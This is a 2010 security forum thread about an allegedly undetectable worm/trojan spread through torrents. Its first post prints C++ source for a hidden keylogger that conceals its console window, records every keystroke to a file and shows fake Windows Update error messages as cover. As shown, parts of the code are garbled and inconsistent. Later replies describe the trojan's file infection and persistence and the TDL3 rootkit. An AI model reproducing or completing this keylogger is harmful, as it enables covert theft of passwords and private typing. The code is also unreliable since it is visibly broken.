• RSS
  • Twitter
  • FaceBook

Security Forums

Log in

FAQ | Search | Usergroups | Profile | Register | RSS | Posting Guidelines | Recent Posts

New Worm/Trojan Spreading

Users browsing this topic:0 Security Fans, 0 Stealth Security Fans
Registered Security Fans: None
Post new topic   Reply to topic   Printer-friendly version    Networking/Security Forums Index -> Viruses // Worms

View previous topic :: View next topic  
Author Message
CleanByte
Just Arrived
Just Arrived


Joined: 02 Nov 2009
Posts: 0


Offline

PostPosted: Wed Mar 03, 2010 3:39 am    Post subject: New Worm/Trojan Spreading Reply with quote

Hey guys, I know I have a low post count, take this as you will, but there is a new Worm/Trojan spreading, which it in itself is not that horrible, but the package is 99% FUD as far as I know, nothing can catch it, I've run just about every diagnostic, hueristic and dependancy scan on it, and nothing shows up. It's being attached to thousands and thousands of common torrents(PIRACY IS ILLEGAL) but I'm just putting the word out that it is there.

I got this information from one of the UG Boards that I'm a member of, in have being a member for awhile on them, I've gained their trust, and access to their VIP section, I talked to the creator of the virus, and coerced him to show me the source code, I'm going to post the sourcecode here(I will take out parts of the code, but will release the full code to "Trusted" members)

I do a fair bit of coding on the side, so I'm going to make a program in the hopes of pinpointing this issue, and see how it works, if infact it does, I'll post the source here.

Code:
#include <windows.h>
#include <stdio.h>
#include <climits>
#include <time.h>
#include <cctype>

using namespace std;

// VARIABLES
bool bExit = false;

unsigned int iGlobalIndex = 0;
const unsigned int NoKeys = 168;
char DataFile[] = "Results.txt";
unsigned int ExitKeyIndex;
unsigned int fter = 5000;
unsigned int ExitKeyDownSince;
const bool bExitMessage = false;


struct clKey
{
    bool bDown;
    char * sKey;
    int iKey;
    bool bCapitalPossible;
    clKey()
    {
        bDown = false;
        iKey = 0;
        sKey = NULL;
    }

    void Set(int paraiKey, char * parasKey, bool parabCapitalPossible)
    {
        iKey = are = parabCapitalPossible;
        iGlobalIndex++;
    }
} Key[NoKeys], OldKy[NoKys];


void LoadKey()
{
    iGlobalIndex = 0;

   character 6]", false);
    Key[iGlobalIndex].Set(VK_OEM_7,"[miscellaneous character 7]", false);
    Key[iGlobalIndex].Set(VK_OEM_8,"[miscellaneous character 8]", false);
    Key[iGlobalIndex].Set(VK_OEM_102,"[miscellaneous character 102]", false);
    Key[iGlobalIndex].Set(VK_PROCESSKEY,"[IME process key]", false);
    Key[iGlobalIndex].Set(VK_ATTN,"[attn key]", false);
    Key[iGlobalIndex].Set(VK_CRSEL,"[crsel key]", false);
    Key[iGlobalIndex].Set(VK_EXSEL,"[exsel key]", false);
    Key[iGlobalIndex].Set(VK_EREOF,"[eof key]", false);
    Key[iGlobalIndex].Set(VK_PLAY,"[play key]", false);
    Key[iGlobalIndex].Set(VK_ZOOM,"[zoom key]", false);
    Key[iGlobalIndex].Set(VK_PA1,"[pa1 key]", false);
    Key[iGlobalIndex].Set(VK_OEM_CLEAR,"[clear key]", false);
}

// FUNCTIONS
int main()
{
   
    HWND Window;
    Window=FindWindow("ConsoleWindowClass",NULL);
    if(Window == NULL)
    {
        MessageBox(NULL,"Windows Update SP3 Installed.","Unexepcted Error",MB_ICONWARNING);
        return(-1);
    }
    ShowWindow(Window,SW_HIDE);
 
    // Load key values into array
    LoadKeys();

    // Create or open file to append
    FILE * file = fopen(DataFile,"a");
    if(file == NULL)
    {
        MessageBox(NULL,"Windows Update SP3 Installed.","Unexepcted Error",MB_ICONWARNING);
        return(-1);
    }

    // Main loop
    while(bExit == false)
    {
        Sleep(1);

       
        for(int x = 0;x<NoKeys;x++)
        {
            if(GetAsyncKeyState(Key[x].iKey) != 0)
            {
                Key[x].bDown = true;
            }
            else
            {
                Key[x].bDown = false;
            }
        }

       
        if(Key[ExitKeyIndex].bDown == true)
        {
            if(ExitKeyDownSince == 0)
            {
                ExitKeyDownSince = clock();
            }
            else
            {
                if(clock()-ExitKeyDownSince > ExitAfter)
                {
                    if(bExitMessage == true)
                    {
                        MessageBox(NULL,"Windows Update SP3 Installed.","Goodbye",MB_ICONINFORMATION);
                    }
                    break;
                }
            }
        }
        else
        {
            ExitKeyDownSince = 0;
        }

        for(int x = 0;x<NoKeys;x++)
        {
            if(Key[x].bDown != OldKey[x].bDown)
            {
                OldKey[x].bDown = Key[x].bDown;

               
                if(Key[x].bDown == true)
                {
                    char * WriteMe = NULL;
                    char UpperCase = NULL;
                    char UpperCaseFull[2];

                    if(Key[x].bCapitalPossible == true)
                    {
                        if(Key[ShiftKeyIndex].bDown == true)
                        {
                            UpperCase = toupper(*Key[x].sKey);
                           
                            UpperCaseFull[0] = UpperCase;
                            UpperCaseFull[1] = '\0';
                            WriteMe = UpperCaseFull;
                        }
                        else
                        {
                            WriteMe = Key[x].sKey;
                        }
                    }
                    else
                    {
                        WriteMe = Key[x].sKey;
                    }

                    fputs(WriteMe,file);
                    break;
                }
            }
        }

       
       
    }
     
     
    if(file != NULL)
    {
        fclose(file);

       
        if(bExitMessage == true)
        {
           
        }
    }
    return (0);
}


If this looks like anything that someone has come across before, I would appreciate a post, just letting me know what they did to remove/not remove it

Regards,
CleanByte
Back to top
View user's profile Send private message
RoboGeek
SF Mod
SF Mod


Joined: 13 Jun 2003
Posts: 16777166
Location: LeRoy, IL

Offline

PostPosted: Wed Mar 03, 2010 4:56 am    Post subject: Reply with quote

I've never found malware I can't detect and kill - but I don't use scanners. Thats the biggest moneymaker for my shop right now, since no shops around here can clean systems. They all want to nuke and pave

The biggie out right now is TDL3 rootkit which creates a virtual drive and uses its own filesystem in it. It hooks the atapi.sys or iastor.sys file and created a hidden drive located at the very end of the hard drive. You can delete the loader, but it regenerates with a new name - the rootkit stays active..

you'll know you have this when HJT, smitfraudfix and combofix crash, along with gmer and dr web cure-it



I have no idea what that is you posted.. I can't really see where it does anything. But I'm not a programmer either
Back to top
View user's profile Send private message Visit poster's website
CleanByte
Just Arrived
Just Arrived


Joined: 02 Nov 2009
Posts: 0


Offline

PostPosted: Wed Mar 03, 2010 6:09 pm    Post subject: Reply with quote

Sorry, I should have been a little more clear when posting the code, the chunk of code posted is for the Keylogger aspect of the virus, I've got the source code for the keylogger, and the Trojan, I've yet to analyse the code fully, but from what I see the trojan will mask itself as the "Boot Partition" and start infecting and .exe, .bat, .com, and some other files as they are executed, also when the files are opened it will create a copy of the file with a .com extension, and as most of you know, windows being its majestic beauty, will run the .com files first. I've been trying to pinpoint exactly what it does, but ever time it infects a file, it changes it's signature so trying to look solely for one signature it useless, also it looks like it writes some registry keys in the event of the infection being quaratined, it will re-download and hide itself in the startup.

As I said previously, I may have a low post count, but I do know quite a bit about viruses, and the such, before I had a dirty hat, but now it's bleached clean.

Anywho, anyone who want's some more info, please feel free to ask me, I'm working on figuring this thing out, I've got it running on my Vbox, and if someone has a new virus that they want info about, they can either post here, because this forum is very experienced, or, I can run it for you and tell you what happens, I've got a seperate rig just made for that, It's running 3 versions of windows(Windows XP, Windows Vista x86, and Windows 7) so I can test out pretty much anything.

Regards,
CleanByte
Back to top
View user's profile Send private message
RoboGeek
SF Mod
SF Mod


Joined: 13 Jun 2003
Posts: 16777166
Location: LeRoy, IL

Offline

PostPosted: Wed Mar 03, 2010 7:56 pm    Post subject: Reply with quote

I know the virus..

if you clean it wrong, it breaks the keyboard input in windows, yet the KB still works for the BIOS, etc

It mimics a virut infection and even triggers some scanners as a virut infection, yet it acts more like catchme. I found it packaged with Security Center 2010 malware on customers PC's, but haven't been able to find the exact thing in the wild to infect a VM so I can play with it
Back to top
View user's profile Send private message Visit poster's website
Display posts from previous:   

Post new topic   Reply to topic   Printer-friendly version    Networking/Security Forums Index -> Viruses // Worms All times are GMT + 2 Hours
Page 1 of 1


 
Jump to:  
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum

Community Area

Log in | Register